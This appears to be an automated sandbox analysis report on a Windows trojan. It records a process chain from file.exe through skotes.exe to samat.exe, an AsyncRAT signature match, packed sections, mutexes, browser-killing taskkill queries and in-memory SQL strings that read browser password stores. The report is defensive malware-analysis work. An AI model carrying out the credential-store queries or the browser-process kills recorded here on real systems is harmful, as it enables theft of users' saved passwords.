Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E08C8 7_2_00007FF7E12E08C8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E6418 7_2_00007FF7E12E6418
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CA474 7_2_00007FF7E12CA474
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CACAD 7_2_00007FF7E12CACAD
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D1B50 7_2_00007FF7E12D1B50
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E3C10 7_2_00007FF7E12E3C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D2C10 7_2_00007FF7E12D2C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E5E7C 7_2_00007FF7E12E5E7C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D9EA0 7_2_00007FF7E12D9EA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12DDEF0 7_2_00007FF7E12DDEF0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D1D54 7_2_00007FF7E12D1D54
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D5D30 7_2_00007FF7E12D5D30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12DE570 7_2_00007FF7E12DE570
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D35A0 7_2_00007FF7E12D35A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E1874 7_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E40AC 7_2_00007FF7E12E40AC
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D80E4 7_2_00007FF7E12D80E4
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D1740 7_2_00007FF7E12D1740
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E9728 7_2_00007FF7E12E9728
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D8794 7_2_00007FF7E12D8794
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D1F60 7_2_00007FF7E12D1F60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C9800 7_2_00007FF7E12C9800
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E6964 8_2_00007FF7E12E6964
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C1000 8_2_00007FF7E12C1000
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12DDA5C 8_2_00007FF7E12DDA5C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12CA2DB 8_2_00007FF7E12CA2DB
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D1944 8_2_00007FF7E12D1944
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D2164 8_2_00007FF7E12D2164
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D39A4 8_2_00007FF7E12D39A4
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C89E0 8_2_00007FF7E12C89E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E08C8 8_2_00007FF7E12E08C8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E6418 8_2_00007FF7E12E6418
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12CA474 8_2_00007FF7E12CA474
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12CACAD 8_2_00007FF7E12CACAD
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D1B50 8_2_00007FF7E12D1B50
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E3C10 8_2_00007FF7E12E3C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D2C10 8_2_00007FF7E12D2C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E5C00 8_2_00007FF7E12E5C00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E5E7C 8_2_00007FF7E12E5E7C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D9EA0 8_2_00007FF7E12D9EA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12DDEF0 8_2_00007FF7E12DDEF0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D1D54 8_2_00007FF7E12D1D54
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D5D30 8_2_00007FF7E12D5D30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12DE570 8_2_00007FF7E12DE570
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D35A0 8_2_00007FF7E12D35A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E1874 8_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E08C8 8_2_00007FF7E12E08C8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E40AC 8_2_00007FF7E12E40AC
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D80E4 8_2_00007FF7E12D80E4
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D1740 8_2_00007FF7E12D1740
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E9728 8_2_00007FF7E12E9728
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D8794 8_2_00007FF7E12D8794
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D1F60 8_2_00007FF7E12D1F60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C9800 8_2_00007FF7E12C9800
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB9710 8_2_00007FF8B7EB9710
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB94B0 8_2_00007FF8B7EB94B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5350 8_2_00007FF8B7EB5350
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EE3A30 8_2_00007FF8B7EE3A30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EE3300 8_2_00007FF8B7EE3300
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8064C70 8_2_00007FF8B8064C70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B805CF30 8_2_00007FF8B805CF30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8002250 8_2_00007FF8B8002250
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF92B0 8_2_00007FF8B7FF92B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8047350 8_2_00007FF8B8047350
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF6930 8_2_00007FF8B7FF6930
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8042950 8_2_00007FF8B8042950
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80099A0 8_2_00007FF8B80099A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FEFA10 8_2_00007FF8B7FEFA10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B804BB00 8_2_00007FF8B804BB00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8044B20 8_2_00007FF8B8044B20
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8036B40 8_2_00007FF8B8036B40
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE9B90 8_2_00007FF8B7FE9B90
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8092BF0 8_2_00007FF8B8092BF0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE3C10 8_2_00007FF8B7FE3C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FFCC40 8_2_00007FF8B7FFCC40
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B803CC40 8_2_00007FF8B803CC40
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B801CC59 8_2_00007FF8B801CC59
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8078C80 8_2_00007FF8B8078C80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B806ACA0 8_2_00007FF8B806ACA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B803BCC0 8_2_00007FF8B803BCC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8030CE0 8_2_00007FF8B8030CE0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF9D00 8_2_00007FF8B7FF9D00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FEBD30 8_2_00007FF8B7FEBD30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B800DDB0 8_2_00007FF8B800DDB0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF0DC0 8_2_00007FF8B7FF0DC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8024E70 8_2_00007FF8B8024E70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B807CEA0 8_2_00007FF8B807CEA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8094FC0 8_2_00007FF8B8094FC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B806BFC0 8_2_00007FF8B806BFC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8008020 8_2_00007FF8B8008020
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8007040 8_2_00007FF8B8007040
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE4120 8_2_00007FF8B7FE4120
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF21E0 8_2_00007FF8B7FF21E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80A42B0 8_2_00007FF8B80A42B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FFD2B0 8_2_00007FF8B7FFD2B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B802F2D0 8_2_00007FF8B802F2D0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B800F2F0 8_2_00007FF8B800F2F0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE32F5 8_2_00007FF8B7FE32F5
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B800D310 8_2_00007FF8B800D310
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B806A300 8_2_00007FF8B806A300
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE7336 8_2_00007FF8B7FE7336
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FFC380 8_2_00007FF8B7FFC380
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80543B0 8_2_00007FF8B80543B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80854A0 8_2_00007FF8B80854A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE94D0 8_2_00007FF8B7FE94D0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B802A510 8_2_00007FF8B802A510
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE4570 8_2_00007FF8B7FE4570
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80045A0 8_2_00007FF8B80045A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B803B5B0 8_2_00007FF8B803B5B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80115A0 8_2_00007FF8B80115A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B800E5C0 8_2_00007FF8B800E5C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF3650 8_2_00007FF8B7FF3650
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B803E670 8_2_00007FF8B803E670
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80406C0 8_2_00007FF8B80406C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8057750 8_2_00007FF8B8057750
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80527E6 8_2_00007FF8B80527E6
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE4820 8_2_00007FF8B7FE4820
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B804C840 8_2_00007FF8B804C840
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8025880 8_2_00007FF8B8025880
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE288E 8_2_00007FF8B7FE288E
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FEA8C0 8_2_00007FF8B7FEA8C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8261FB0 8_2_00007FF8B8261FB0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B82623E0 8_2_00007FF8B82623E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8274810 8_2_00007FF8B8274810
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B82745C0 8_2_00007FF8B82745C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8281300 8_2_00007FF8B8281300
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8282270 8_2_00007FF8B8282270
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8281950 8_2_00007FF8B8281950
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8331596 8_2_00007FF8B8331596
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B837D980 8_2_00007FF8B837D980
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8379A60 8_2_00007FF8B8379A60
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd 78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF7E12C2910 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF8B8011E20 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF8B83AD32F appears 41 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF7E12C2710 appears 104 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF8B7E8C400 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF8B83AD341 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF8B7FE9340 appears 135 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF8B7FEA500 appears 163 times
PE file contains executable resources (Code or Archives)
Source: _overlapped.pyd.7.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.7.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Spawns drivers
Source: unknown Driver loaded: C:\Windows\System32\drivers\mstee.sys
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: dump.pcap, type: PCAP Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: file.exe Static PE information: Section: ZLIB complexity 0.9980096219346049
Source: file.exe Static PE information: Section: fjmpujlc ZLIB complexity 0.9948450497623291
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9980096219346049
Source: skotes.exe.0.dr Static PE information: Section: fjmpujlc ZLIB complexity 0.9948450497623291
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@147/209@43/19
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E8C400 GetLastError,FormatMessageW,_Py_NoneStruct,_Py_NoneStruct,PyUnicode_FromWideChar,PyUnicode_DecodeMBCS,Py_BuildValue,LocalFree,PyErr_SetObject,_Py_Dealloc, 8_2_00007FF8B7E8C400
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBAC38 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CertOpenSystemStoreW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,_Py_NewReference,PyLong_FromVoidPtr,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z, 8_2_00007FF8B7EBAC38
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT item1, item2 FROM metadata;
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: samat.exe, samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT a11, a102 FROM nssPrivate WHERE a102 = ?;
Source: samat.exe, 00000008.00000003.3921967640.000001BCCD5EF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3921967640.000001BCCD5D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe ReversingLabs: Detection: 47%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
